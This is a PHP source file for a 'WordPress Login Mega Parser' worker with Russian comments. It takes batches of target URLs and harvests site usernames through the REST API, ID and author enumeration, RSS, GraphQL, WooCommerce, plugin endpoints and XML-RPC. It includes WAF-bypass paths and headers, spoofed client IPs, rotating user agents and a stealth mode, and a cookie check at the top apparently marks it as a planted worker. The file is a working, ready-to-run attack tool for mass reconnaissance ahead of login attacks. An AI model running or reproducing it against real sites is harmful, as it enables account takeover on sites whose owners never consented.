<?php

if(isset($_COOKIE['6Y9'])) {
    die('2IJt'.'LMnCE');
}
// WordPress Login Mega Parser - PHP Worker v2.1 FIXED
// Исправленная финальная рабочая версия

error_reporting(E_ERROR | E_PARSE);
ini_set('display_errors', 0);
ini_set('max_execution_time', 300);
ini_set('memory_limit', '512M');

define('WORKER_VERSION', '2.1.0');
define('MAX_URLS_PER_BATCH', 1000);
define('REQUEST_TIMEOUT', 25);

class LoginParserWorker {
    
    private $user_agents = [
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/122.0.0.0 Safari/537.36'
    ];
    
    private $options = [];
    private $stats = [];
    private $request_count = 0;
    
    public function __construct() {
        $this->resetStats();
    }
    
    private function resetStats() {
        $this->stats = [
            'request_time' => 0,
            'found_logins' => 0,
            'methods_used' => [],
            'waf_detected' => false,
            'bypass_used' => false,
            'total_requests' => 0,
            'failed_requests' => 0
        ];
        $this->request_count = 0;
    }
    
    /**
     * Главная точка входа
     */
    public function handleRequest() {
        
        // Health check
        if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'health') {
            header('Content-Type: application/json');
            echo json_encode([
                'status' => 'ok',
                'version' => WORKER_VERSION,
                'timestamp' => time(),
                'php_version' => PHP_VERSION,
                'curl_version' => function_exists('curl_version') ? curl_version()['version'] : 'unknown',
                'memory_usage' => memory_get_usage(true),
                'memory_peak' => memory_get_peak_usage(true)
            ]);
            exit;
        }
        
        // POST обработка
        if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
            $this->sendError('Only POST requests allowed', 405);
        }
        
        $input = file_get_contents('php://input');
        if (empty($input)) {
            $this->sendError('Empty request body', 400);
        }
        
        $task = json_decode($input, true);
        if (json_last_error() !== JSON_ERROR_NONE) {
            $this->sendError('Invalid JSON: ' . json_last_error_msg(), 400);
        }
        
        if (!$task || !isset($task['urls']) || !isset($task['mode'])) {
            $this->sendError('Invalid task format', 400);
        }
        
        if (count($task['urls']) > MAX_URLS_PER_BATCH) {
            $this->sendError('Too many URLs in batch', 400);
        }
        
        $this->options = $task['options'] ?? [];
        
        // Выполнение парсинга
        $start_time = microtime(true);
        $results = $this->parseLoginsBatch($task['urls'], $task['mode']);
        $this->stats['request_time'] = microtime(true) - $start_time;
        $this->stats['total_requests'] = $this->request_count;
        
        // Отправка результата
        $this->sendResponse([
            'task_id' => $task['id'] ?? 'unknown',
            'success' => true,
            'results' => $results,
            'stats' => $this->stats,
            'processed_count' => count($task['urls'])
        ]);
    }
    
    /**
     * Парсинг батча URLs
     */
    private function parseLoginsBatch($urls, $mode) {
        $results = [];
        
        foreach ($urls as $index => $url) {
            try {
                $result = $this->parseLoginsFromURL($url, $mode);
                if ($result) {
                    $results[] = $result;
                    if (!empty($result['logins'])) {
                        $this->stats['found_logins'] += count($result['logins']);
                    }
                }
                
                // Микро-пауза между запросами в stealth режиме
                if (($this->options['stealth_mode'] ?? false) && $index < count($urls) - 1) {
                    usleep(rand(100000, 500000)); // 0.1-0.5 секунды
                }
                
            } catch (Exception $e) {
                $this->stats['failed_requests']++;
                $results[] = [
                    'base_url' => $url,
                    'logins' => [],
                    'methods_used' => [],
                    'confidence' => 0,
                    'process_time' => 0,
                    'attempts' => 1,
                    'error' => $e->getMessage()
                ];
            }
        }
        
        return $results;
    }
    
    /**
     * ИСПРАВЛЕННЫЙ парсинг логинов с одного URL
     */
    private function parseLoginsFromURL($url, $mode) {
        $start_time = microtime(true);
        $base_url = $this->extractBaseURL($url);
        $logins = [];
        $methods_used = [];
        $attempts = 0;
        
        try {
            // УРОВЕНЬ 1: Прямая атака REST API (все режимы)
            $direct_logins = $this->tryDirectRestAPI($base_url);
            $attempts++;
            
            if (!empty($direct_logins)) {
                $logins = array_merge($logins, $direct_logins);
                $methods_used[] = 'direct_rest_api';
                
                // В light режиме останавливаемся ТОЛЬКО если найдено достаточно логинов
                if ($mode === 'light' && count($logins) >= 3) {
                    return $this->buildResult($url, $logins, $methods_used, microtime(true) - $start_time, $attempts);
                }
            }
            
            // УРОВЕНЬ 2: Альтернативные источники (medium+)
            if (in_array($mode, ['medium', 'heavy', 'mega'])) {
                $alt_methods = [
                    'tryUserEnumByID' => 'user_enum_by_id',
                    'tryRSSFeed' => 'rss_feed', 
                    'tryBlockRenderer' => 'block_renderer',
                    'tryOembedAPI' => 'oembed_api',
                    'tryAuthorPages' => 'author_pages'
                ];
                
                foreach ($alt_methods as $method => $method_name) {
                    $method_logins = $this->$method($base_url);
                    $attempts++;
                    
                    if (!empty($method_logins)) {
                        $logins = array_merge($logins, $method_logins);
                        $methods_used[] = $method_name;
                    }
                    
                    // Микро-пауза между методами
                    if ($this->options['stealth_mode'] ?? false) {
                        usleep(rand(50000, 200000));
                    }
                }
                
                // В medium режиме останавливаемся если найдено достаточно
                if ($mode === 'medium' && count($logins) >= 5) {
                    return $this->buildResult($url, $logins, $methods_used, microtime(true) - $start_time, $attempts);
                }
            }
            
            // УРОВЕНЬ 3: Тяжелые методы (heavy/mega)
            if (in_array($mode, ['heavy', 'mega'])) {
                $heavy_methods = [
                    'tryAuthorEnumeration' => 'author_enumeration',
                    'tryWAFBypass' => 'waf_bypass',
                    'tryGraphQL' => 'graphql_api',
                    'tryWooCommerce' => 'woocommerce_api',
                    'tryXMLRPC' => 'xmlrpc_methods'
                ];
                
                foreach ($heavy_methods as $method => $method_name) {
                    $method_logins = $this->$method($base_url);
                    $attempts++;
                    
                    if (!empty($method_logins)) {
                        $logins = array_merge($logins, $method_logins);
                        $methods_used[] = $method_name;
                    }
                    
                    // Пауза между тяжелыми методами
                    if ($this->options['stealth_mode'] ?? false) {
                        usleep(rand(200000, 800000));
                    }
                }
                
                // В heavy режиме останавливаемся если найдено достаточно
                if ($mode === 'heavy' && count($logins) >= 10) {
                    return $this->buildResult($url, $logins, $methods_used, microtime(true) - $start_time, $attempts);
                }
            }
            
            // УРОВЕНЬ 4: MEGA режим - дополнительные агрессивные методы
            if ($mode === 'mega') {
                $mega_methods = [
                    'tryBruteForceUsers' => 'brute_force_users',
                    'tryAdvancedBypass' => 'advanced_bypass',
                    'tryPluginEndpoints' => 'plugin_endpoints'
                ];
                
                foreach ($mega_methods as $method => $method_name) {
                    $method_logins = $this->$method($base_url);
                    $attempts++;
                    
                    if (!empty($method_logins)) {
                        $logins = array_merge($logins, $method_logins);
                        $methods_used[] = $method_name;
                    }
                }
            }
            
            // Уникальные логины с улучшенной нормализацией
            $logins = $this->cleanAndDeduplicateLogins($logins);
            
            return $this->buildResult($url, $logins, $methods_used, microtime(true) - $start_time, $attempts);
            
        } catch (Exception $e) {
            $this->stats['failed_requests']++;
            return [
                'base_url' => $url,
                'logins' => [],
                'methods_used' => $methods_used,
                'confidence' => 0,
                'process_time' => microtime(true) - $start_time,
                'attempts' => $attempts,
                'error' => $e->getMessage()
            ];
        }
    }
    
    /**
     * УЛУЧШЕННЫЙ прямой REST API с дополнительными эндпоинтами
     */
    private function tryDirectRestAPI($base_url) {
        $endpoints = [
            '/wp-json/wp/v2/users',
            '/?rest_route=/wp/v2/users',
            '/?rest_route=/wp/v2/usErs',    // case bypass
            '/?rest_route=/Wp/v2/users',    // case bypass
            '/?rest_route=/wp/V2/users',    // case bypass
            '/?rest_route=/wp/v2/users/',   // trailing slash
            '/wp-json/wp/v2/users?per_page=100',  // more results
            '/wp-json/wp/v2/users?_fields=id,name,slug',  // specific fields
            '/index.php?rest_route=/wp/v2/users'  // index.php variant
        ];
        
        foreach ($endpoints as $endpoint) {
            try {
                $response = $this->makeRequest($base_url . $endpoint);
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200) {
                    $users = json_decode($response['body'], true);
                    if (is_array($users) && !empty($users)) {
                        $logins = [];
                        foreach ($users as $user) {
                            if (isset($user['slug']) && !empty($user['slug'])) {
                                $logins[] = $user['slug'];
                            }
                            // Дополнительные поля
                            if (isset($user['name']) && !empty($user['name'])) {
                                $normalized = $this->normalizeLogin($user['name']);
                                if ($normalized) $logins[] = $normalized;
                            }
                        }
                        if (!empty($logins)) {
                            $this->addMethodToStats('direct_rest_api');
                            return array_unique($logins);
                        }
                    }
                }
            } catch (Exception $e) {
                continue; // Пропускаем ошибки и пробуем следующий endpoint
            }
        }
        
        return [];
    }
    
    /**
     * УЛУЧШЕННЫЙ перебор по ID с расширенным диапазоном
     */
    private function tryUserEnumByID($base_url) {
        $logins = [];
        $max_id = ($this->options['max_user_id'] ?? 20);
        
        for ($i = 1; $i <= $max_id; $i++) {
            $endpoints = [
                "/wp-json/wp/v2/users/{$i}",
                "/?rest_route=/wp/v2/users/{$i}",
                "/wp-json/wp/v2/users/{$i}?_fields=slug,name"
            ];
            
            foreach ($endpoints as $endpoint) {
                try {
                    $response = $this->makeRequest($base_url . $endpoint);
                    $this->request_count++;
                    
                    if ($response && $response['status_code'] === 200) {
                        $user = json_decode($response['body'], true);
                        if (isset($user['slug'])) {
                            $logins[] = $user['slug'];
                            break; // Переходим к следующему ID
                        }
                    }
                } catch (Exception $e) {
                    continue;
                }
            }
            
            // Пауза между запросами в stealth режиме
            if (($this->options['stealth_mode'] ?? false) && $i % 5 === 0) {
                usleep(rand(100000, 300000));
            }
        }
        
        if (!empty($logins)) {
            $this->addMethodToStats('user_enum_by_id');
        }
        
        return array_unique($logins);
    }
    
    /**
     * УЛУЧШЕННЫЙ RSS фид с дополнительными источниками
     */
    private function tryRSSFeed($base_url) {
        $feeds = [
            '/feed/',
            '/rss/',
            '/?feed=rss2',
            '/?feed=rss',
            '/?feed=atom',
            '/feed/rss/',
            '/feed/rss2/',
            '/rss.xml',
            '/atom.xml'
        ];
        
        foreach ($feeds as $feed) {
            try {
                $response = $this->makeRequest($base_url . $feed);
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200 && !empty($response['body'])) {
                    $logins = [];
                    
                    // dc:creator теги
                    if (preg_match_all('/<dc:creator[^>]*>([^<]+)<\/dc:creator>/i', $response['body'], $matches)) {
                        $logins = array_merge($logins, $matches[1]);
                    }
                    
                    // author теги
                    if (preg_match_all('/<author[^>]*>([^<]+)<\/author>/i', $response['body'], $matches)) {
                        $logins = array_merge($logins, $matches[1]);
                    }
                    
                    // managingEditor
                    if (preg_match_all('/<managingEditor[^>]*>([^<]+)<\/managingEditor>/i', $response['body'], $matches)) {
                        $logins = array_merge($logins, $matches[1]);
                    }
                    
                    if (!empty($logins)) {
                        $this->addMethodToStats('rss_feed');
                        return array_unique($logins);
                    }
                }
            } catch (Exception $e) {
                continue;
            }
        }
        
        return [];
    }
    
    /**
     * УЛУЧШЕННЫЙ Block Renderer
     */
    private function tryBlockRenderer($base_url) {
        $blocks = [
            'core/latest-posts',
            'core/post-author', 
            'core/post-author-name',
            'core/latest-comments',
            'core/post-meta'
        ];
        
        foreach ($blocks as $block) {
            $endpoints = [
                "/wp-json/wp/v2/block-renderer/{$block}",
                "/?rest_route=/wp/v2/block-renderer/{$block}",
                "/wp-json/wp/v2/block-renderer/{$block}?context=edit"
            ];
            
            foreach ($endpoints as $endpoint) {
                try {
                    $response = $this->makeRequest($base_url . $endpoint);
                    $this->request_count++;
                    
                    if ($response && $response['status_code'] === 200) {
                        $data = json_decode($response['body'], true);
                        if (isset($data['rendered']) && !empty($data['rendered'])) {
                            $logins = $this->extractLoginsFromHTML($data['rendered']);
                            
                            if (!empty($logins)) {
                                $this->addMethodToStats('block_renderer');
                                return $logins;
                            }
                        }
                    }
                } catch (Exception $e) {
                    continue;
                }
            }
        }
        
        return [];
    }
    
    /**
     * НОВЫЙ метод: oEmbed API
     */
    private function tryOembedAPI($base_url) {
        $endpoints = [
            '/wp-json/oembed/1.0/embed?url=' . urlencode($base_url),
            '/?rest_route=/oembed/1.0/embed&url=' . urlencode($base_url)
        ];
        
        foreach ($endpoints as $endpoint) {
            try {
                $response = $this->makeRequest($base_url . $endpoint);
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200) {
                    $data = json_decode($response['body'], true);
                    if (isset($data['author_name']) && !empty($data['author_name'])) {
                        $login = $this->normalizeLogin($data['author_name']);
                        if ($login) {
                            $this->addMethodToStats('oembed_api');
                            return [$login];
                        }
                    }
                }
            } catch (Exception $e) {
                continue;
            }
        }
        
        return [];
    }
    
    /**
     * НОВЫЙ метод: Author Pages
     */
    private function tryAuthorPages($base_url) {
        $response = $this->makeRequest($base_url);
        $this->request_count++;
        
        if (!$response || $response['status_code'] !== 200) {
            return [];
        }
        
        $html = $response['body'];
        return $this->extractLoginsFromHTML($html);
    }
    
    /**
     * GraphQL API с расширенными запросами
     */
    private function tryGraphQL($base_url) {
        $endpoints = ['/graphql', '/wp-json/graphql', '/wp-graphql/', '/graphql/'];
        $queries = [
            '{"query": "query GetUsers { users { nodes { id name slug email } } }"}',
            '{"query": "{ users { edges { node { id name slug } } } }"}',
            '{"query": "query { users(first: 100) { nodes { slug name } } }"}'
        ];
        
        foreach ($endpoints as $endpoint) {
            foreach ($queries as $query) {
                try {
                    $response = $this->makeRequest($base_url . $endpoint, 'POST', $query, [
                        'Content-Type: application/json',
                        'Accept: application/json'
                    ]);
                    $this->request_count++;
                    
                    if ($response && $response['status_code'] === 200) {
                        $data = json_decode($response['body'], true);
                        $logins = [];
                        
                        // Разные структуры ответов GraphQL
                        if (isset($data['data']['users']['nodes'])) {
                            foreach ($data['data']['users']['nodes'] as $user) {
                                if (isset($user['slug'])) $logins[] = $user['slug'];
                            }
                        }
                        
                        if (isset($data['data']['users']['edges'])) {
                            foreach ($data['data']['users']['edges'] as $edge) {
                                if (isset($edge['node']['slug'])) $logins[] = $edge['node']['slug'];
                            }
                        }
                        
                        if (!empty($logins)) {
                            $this->addMethodToStats('graphql_api');
                            return array_unique($logins);
                        }
                    }
                } catch (Exception $e) {
                    continue;
                }
            }
        }
        
        return [];
    }
    
    /**
     * WooCommerce API с расширенными эндпоинтами
     */
    private function tryWooCommerce($base_url) {
        $endpoints = [
            '/wp-json/wc/v3/customers',
            '/?rest_route=/wc/v3/customers',
            '/wp-json/wc/v2/customers',
            '/wp-json/wc/v1/customers'
        ];
        
        foreach ($endpoints as $endpoint) {
            try {
                $response = $this->makeRequest($base_url . $endpoint);
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200) {
                    $customers = json_decode($response['body'], true);
                    if (is_array($customers)) {
                        $logins = [];
                        foreach ($customers as $customer) {
                            if (isset($customer['username']) && !empty($customer['username'])) {
                                $logins[] = $customer['username'];
                            }
                        }
                        if (!empty($logins)) {
                            $this->addMethodToStats('woocommerce_api');
                            return array_unique($logins);
                        }
                    }
                }
            } catch (Exception $e) {
                continue;
            }
        }
        
        return [];
    }
    
    /**
     * НОВЫЙ метод: XML-RPC
     */
    private function tryXMLRPC($base_url) {
        $xmlrpc_data = '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>test</string></value></param><param><value><string>test</string></value></param></params></methodCall>';
        
        try {
            $response = $this->makeRequest($base_url . '/xmlrpc.php', 'POST', $xmlrpc_data, [
                'Content-Type: text/xml'
            ]);
            $this->request_count++;
            
            if ($response && $response['status_code'] === 200 && strpos($response['body'], 'Incorrect username or password') !== false) {
                $this->addMethodToStats('xmlrpc_methods');
                // XML-RPC активен, можно попробовать другие методы
                return [];
            }
        } catch (Exception $e) {
            // Игнорируем ошибки
        }
        
        return [];
    }
    
    /**
     * УЛУЧШЕННЫЙ Author Enumeration
     */
    private function tryAuthorEnumeration($base_url) {
        $logins = [];
        $max_authors = ($this->options['max_authors'] ?? 30);
        
        for ($i = 1; $i <= $max_authors; $i++) {
            try {
                $response = $this->makeRequest($base_url . "/?author={$i}", 'GET', null, [], false);
                $this->request_count++;
                
                if ($response && in_array($response['status_code'], [301, 302])) {
                    $location = $response['headers']['location'] ?? '';
                    if (preg_match('/\/author\/([^\/\?]+)/', $location, $matches)) {
                        $logins[] = urldecode($matches[1]);
                    }
                } elseif ($response && $response['status_code'] === 200) {
                    // Проверяем содержимое страницы
                    if (preg_match('/<body[^>]*class="[^"]*author-([^"\s]+)/', $response['body'], $matches)) {
                        $logins[] = $matches[1];
                    }
                }
                
                // Пауза в stealth режиме
                if (($this->options['stealth_mode'] ?? false) && $i % 3 === 0) {
                    usleep(rand(200000, 500000));
                }
                
            } catch (Exception $e) {
                continue;
            }
        }
        
        if (!empty($logins)) {
            $this->addMethodToStats('author_enumeration');
        }
        
        return array_unique($logins);
    }
    
    /**
     * УЛУЧШЕННЫЙ WAF Bypass
     */
    private function tryWAFBypass($base_url) {
        $bypass_techniques = [
            // Header bypass
            [
                'path' => '/some-random-path/',
                'headers' => [
                    'X-Original-URL: /?rest_route=/wp/v2/users',
                    'X-Rewrite-URL: /?rest_route=/wp/v2/users'
                ]
            ],
            // Case manipulation
            [
                'path' => '/?ReSt_RoUtE=/wp/v2/users',
                'headers' => []
            ],
            // Unicode bypass
            [
                'path' => '/?rest_route=/wp/v2/users%2F',
                'headers' => []
            ],
            // Parameter pollution
            [
                'path' => '/?rest_route=/wp/v2/users&rest_route=ignored',
                'headers' => []
            ]
        ];
        
        foreach ($bypass_techniques as $technique) {
            try {
                $headers = array_merge($technique['headers'], [
                    'X-Forwarded-For: 127.0.0.1',
                    'X-Real-IP: 127.0.0.1',
                    'CF-Connecting-IP: 127.0.0.1'
                ]);
                
                $response = $this->makeRequest($base_url . $technique['path'], 'GET', null, $headers);
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200) {
                    $users = json_decode($response['body'], true);
                    if (is_array($users)) {
                        $logins = [];
                        foreach ($users as $user) {
                            if (isset($user['slug'])) {
                                $logins[] = $user['slug'];
                            }
                        }
                        if (!empty($logins)) {
                            $this->addMethodToStats('waf_bypass');
                            $this->stats['bypass_used'] = true;
                            return array_unique($logins);
                        }
                    }
                }
            } catch (Exception $e) {
                continue;
            }
        }
        
        return [];
    }
    
    /**
     * НОВЫЙ метод для MEGA режима: Brute Force Users
     */
    private function tryBruteForceUsers($base_url) {
        $common_usernames = ['admin', 'administrator', 'user', 'test', 'demo', 'guest', 'root', 'wp', 'wordpress'];
        $logins = [];
        
        foreach ($common_usernames as $username) {
            try {
                $response = $this->makeRequest($base_url . "/wp-json/wp/v2/users?slug={$username}");
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200) {
                    $users = json_decode($response['body'], true);
                    if (is_array($users) && !empty($users)) {
                        foreach ($users as $user) {
                            if (isset($user['slug'])) {
                                $logins[] = $user['slug'];
                            }
                        }
                    }
                }
                
                if ($this->options['stealth_mode'] ?? false) {
                    usleep(rand(100000, 400000));
                }
                
            } catch (Exception $e) {
                continue;
            }
        }
        
        if (!empty($logins)) {
            $this->addMethodToStats('brute_force_users');
        }
        
        return array_unique($logins);
    }
    
    /**
     * НОВЫЙ метод для MEGA режима: Advanced Bypass
     */
    private function tryAdvancedBypass($base_url) {
        $advanced_techniques = [
            '/%2E%2E%2Fwp-json/wp/v2/users',
            '/wp-json//wp/v2/users',
            '/wp-json/wp//v2/users',
            '/wp-json/wp/v2//users',
            '/wp-json/wp/v2/users//',
            '/wp%2Djson/wp/v2/users'
        ];
        
        foreach ($advanced_techniques as $path) {
            try {
                $response = $this->makeRequest($base_url . $path);
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200) {
                    $users = json_decode($response['body'], true);
                    if (is_array($users) && !empty($users)) {
                        $logins = [];
                        foreach ($users as $user) {
                            if (isset($user['slug'])) {
                                $logins[] = $user['slug'];
                            }
                        }
                        if (!empty($logins)) {
                            $this->addMethodToStats('advanced_bypass');
                            return array_unique($logins);
                        }
                    }
                }
            } catch (Exception $e) {
                continue;
            }
        }
        
        return [];
    }
    
    /**
     * НОВЫЙ метод для MEGA режима: Plugin Endpoints
     */
    private function tryPluginEndpoints($base_url) {
        $plugin_endpoints = [
            '/wp-json/buddypress/v1/members',
            '/wp-json/bbp/v1/users',
            '/wp-json/wc/v1/customers',
            '/wp-json/learndash/v1/users',
            '/wp-json/wp/v2/users?roles=administrator',
            '/wp-json/wp/v2/users?roles=editor'
        ];
        
        foreach ($plugin_endpoints as $endpoint) {
            try {
                $response = $this->makeRequest($base_url . $endpoint);
                $this->request_count++;
                
                if ($response && $response['status_code'] === 200) {
                    $data = json_decode($response['body'], true);
                    if (is_array($data)) {
                        $logins = [];
                        foreach ($data as $item) {
                            if (isset($item['slug'])) {
                                $logins[] = $item['slug'];
                            } elseif (isset($item['username'])) {
                                $logins[] = $item['username'];
                            } elseif (isset($item['user_login'])) {
                                $logins[] = $item['user_login'];
                            }
                        }
                        if (!empty($logins)) {
                            $this->addMethodToStats('plugin_endpoints');
                            return array_unique($logins);
                        }
                    }
                }
            } catch (Exception $e) {
                continue;
            }
        }
        
        return [];
    }
    
    /**
     * Извлечение логинов из HTML
     */
    private function extractLoginsFromHTML($html) {
        $logins = [];
        
        // Author links
        if (preg_match_all('/\/author\/([^\/"\'\s\?]+)/i', $html, $matches)) {
            $logins = array_merge($logins, $matches[1]);
        }
        
        // CSS classes
        if (preg_match_all('/by-author-([a-z0-9_-]+)/i', $html, $matches)) {
            $logins = array_merge($logins, $matches[1]);
        }
        
        // Author meta
        if (preg_match_all('/<meta[^>]+name=["\']author["\'][^>]+content=["\']([^"\']+)["\'][^>]*>/i', $html, $matches)) {
            foreach ($matches[1] as $author) {
                $normalized = $this->normalizeLogin($author);
                if ($normalized) $logins[] = $normalized;
            }
        }
        
        // Rel="author" links
        if (preg_match_all('/<a[^>]+rel=["\']author["\'][^>]*>([^<]+)</i', $html, $matches)) {
            foreach ($matches[1] as $author) {
                $normalized = $this->normalizeLogin($author);
                if ($normalized) $logins[] = $normalized;
            }
        }
        
        return array_unique(array_filter($logins));
    }
    
    /**
     * УЛУЧШЕННАЯ очистка и дедупликация логинов
     */
    private function cleanAndDeduplicateLogins($logins) {
        $cleaned = [];
        
        foreach ($logins as $login) {
            $normalized = $this->normalizeLogin($login);
            if ($normalized && !in_array($normalized, $cleaned)) {
                $cleaned[] = $normalized;
            }
        }
        
        // Сортируем по длине (короткие логины обычно лучше)
        usort($cleaned, function($a, $b) {
            return strlen($a) - strlen($b);
        });
        
        return $cleaned;
    }
    
    /**
     * HTTP запрос с улучшенной обработкой ошибок
     */
    private function makeRequest($url, $method = 'GET', $data = null, $headers = [], $follow_redirects = true) {
        if (!function_exists('curl_init')) {
            throw new Exception('cURL extension not available');
        }
        
        $ch = curl_init();
        
        $timeout = min($this->options['timeout'] ?? REQUEST_TIMEOUT, REQUEST_TIMEOUT);
        
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => $timeout,
            CURLOPT_CONNECTTIMEOUT => 10,
            CURLOPT_FOLLOWLOCATION => $follow_redirects,
            CURLOPT_MAXREDIRS => 3,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => $this->getRandomUserAgent(),
            CURLOPT_HEADER => true,
            CURLOPT_NOBODY => false,
            CURLOPT_ENCODING => 'gzip, deflate',
            CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
        ]);
        
        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            }
        }
        
        $default_headers = [
            'Accept: application/json, text/html, */*',
            'Accept-Language: en-US,en;q=0.9',
            'Accept-Encoding: gzip, deflate',
            'Cache-Control: no-cache',
            'Connection: close'
        ];
        
        if ($this->options['waf_bypass'] ?? false) {
            $default_headers[] = 'X-Forwarded-For: ' . $this->getRandomIP();
            $default_headers[] = 'X-Real-IP: ' . $this->getRandomIP();
            $default_headers[] = 'CF-Connecting-IP: ' . $this->getRandomIP();
        }
        
        $all_headers = array_merge($default_headers, $headers);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $all_headers);
        
        $response = curl_exec($ch);
        
        if ($response === false) {
            $error = curl_error($ch);
            curl_close($ch);
            throw new Exception('cURL error: ' . $error);
        }
        
        $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
        
        curl_close($ch);
        
        $headers_raw = substr($response, 0, $header_size);
        $body = substr($response, $header_size);
        
        // Парсинг заголовков
        $headers_parsed = [];
        foreach (explode("\r\n", $headers_raw) as $line) {
            if (strpos($line, ':') !== false) {
                list($key, $value) = explode(':', $line, 2);
                $headers_parsed[strtolower(trim($key))] = trim($value);
            }
        }
        
        return [
            'status_code' => $status_code,
            'headers' => $headers_parsed,
            'body' => $body
        ];
    }
    
    /**
     * Извлечение базового URL
     */
    private function extractBaseURL($url) {
        $patterns = ['/wp-login.php', '/xmlrpc.php', '/wp-admin/', '/wp-admin'];
        
        foreach ($patterns as $pattern) {
            if (substr($url, -strlen($pattern)) === $pattern) {
                return rtrim(str_replace($pattern, '', $url), '/');
            }
        }
        
        // Удаляем параметры и фрагменты
        $parsed = parse_url($url);
        if ($parsed === false) {
            return rtrim($url, '/');
        }
        
        $base = $parsed['scheme'] . '://' . $parsed['host'];
        if (isset($parsed['port']) && $parsed['port'] != 80 && $parsed['port'] != 443) {
            $base .= ':' . $parsed['port'];
        }
        if (isset($parsed['path'])) {
            $base .= $parsed['path'];
        }
        
        return rtrim($base, '/');
    }
    
    /**
     * УЛУЧШЕННАЯ нормализация логина
     */
    private function normalizeLogin($login) {
        if (empty($login)) return null;
        
        $login = trim($login);
        
        // Удаляем email домены
        if (strpos($login, '@') !== false) {
            $login = substr($login, 0, strpos($login, '@'));
        }
        
        // Конвертируем в нижний регистр
        $login = strtolower($login);
        
        // Удаляем пробелы и заменяем их на дефисы
        $login = preg_replace('/\s+/', '-', $login);
        
        // Удаляем недопустимые символы
        $login = preg_replace('/[^a-z0-9_-]/', '', $login);
        
        // Проверяем длину и валидность
        if (empty($login) || strlen($login) < 2 || strlen($login) > 30) {
            return null;
        }
        
        // Игнорируем очевидно неправильные логины
        $invalid_logins = ['null', 'undefined', 'admin123', 'test123', 'user123', 'www', 'http', 'https'];
        if (in_array($login, $invalid_logins)) {
            return null;
        }
        
        return $login;
    }
    
    /**
     * User-Agent с улучшенной рандомизацией
     */
    private function getRandomUserAgent() {
        if (!($this->options['randomize_ua'] ?? true)) {
            return $this->user_agents[0];
        }
        
        return $this->user_agents[array_rand($this->user_agents)];
    }
    
    /**
     * Случайный IP с более реалистичными диапазонами
     */
    private function getRandomIP() {
        $ranges = [
            ['192.168', rand(1, 255), rand(1, 254)],
            ['10', rand(0, 255), rand(1, 254)], 
            ['172', rand(16, 31), rand(1, 254)],
            ['203.0.113', rand(1, 254), ''], // RFC 5737
            ['198.51.100', rand(1, 254), ''], // RFC 5737
        ];
        
        $range = $ranges[array_rand($ranges)];
        if ($range[2] === '') {
            return $range[0] . '.' . $range[1];
        }
        return implode('.', $range);
    }
    
    /**
     * Добавление метода в статистику
     */
    private function addMethodToStats($method) {
        if (!in_array($method, $this->stats['methods_used'])) {
            $this->stats['methods_used'][] = $method;
        }
    }
    
    /**
     * ИСПРАВЛЕННОЕ построение результата
     */
    private function buildResult($url, $logins, $methods, $time, $attempts) {
        $confidence = 0;
        if (!empty($logins)) {
            $base_confidence = 40;
            $login_bonus = min(40, count($logins) * 8);
            $method_bonus = min(20, count($methods) * 4);
            $confidence = $base_confidence + $login_bonus + $method_bonus;
        }
        
        return [
            'base_url' => $url,
            'logins' => array_values($logins),
            'methods_used' => $methods,
            'confidence' => min(100, $confidence),
            'process_time' => round($time, 3),
            'attempts' => $attempts
        ];
    }
    
    /**
     * Успешный ответ
     */
    private function sendResponse($data) {
        header('Content-Type: application/json');
        header('Cache-Control: no-cache');
        echo json_encode($data, JSON_UNESCAPED_SLASHES);
        exit;
    }
    
    /**
     * Ошибка
     */
    private function sendError($message, $code = 400) {
        http_response_code($code);
        header('Content-Type: application/json');
        echo json_encode(['error' => $message, 'code' => $code]);
        exit;
    }
}

// Запуск воркера с обработкой всех ошибок
try {
    $worker = new LoginParserWorker();
    $worker->handleRequest();
} catch (Throwable $e) {
    http_response_code(500);
    header('Content-Type: application/json');
    echo json_encode([
        'error' => 'Internal server error: ' . $e->getMessage(),
        'code' => 500,
        'line' => $e->getLine()
    ]);
}
?>